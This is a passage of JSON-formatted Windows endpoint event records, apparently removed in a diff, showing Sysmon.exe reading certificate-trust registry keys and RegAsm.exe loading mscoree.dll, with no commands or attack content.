2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863090000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "RegAsm.exe", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "mscoree.dll", - "image_path": "C:\\Windows\\SysWOW64\\mscoree.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { 
- "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 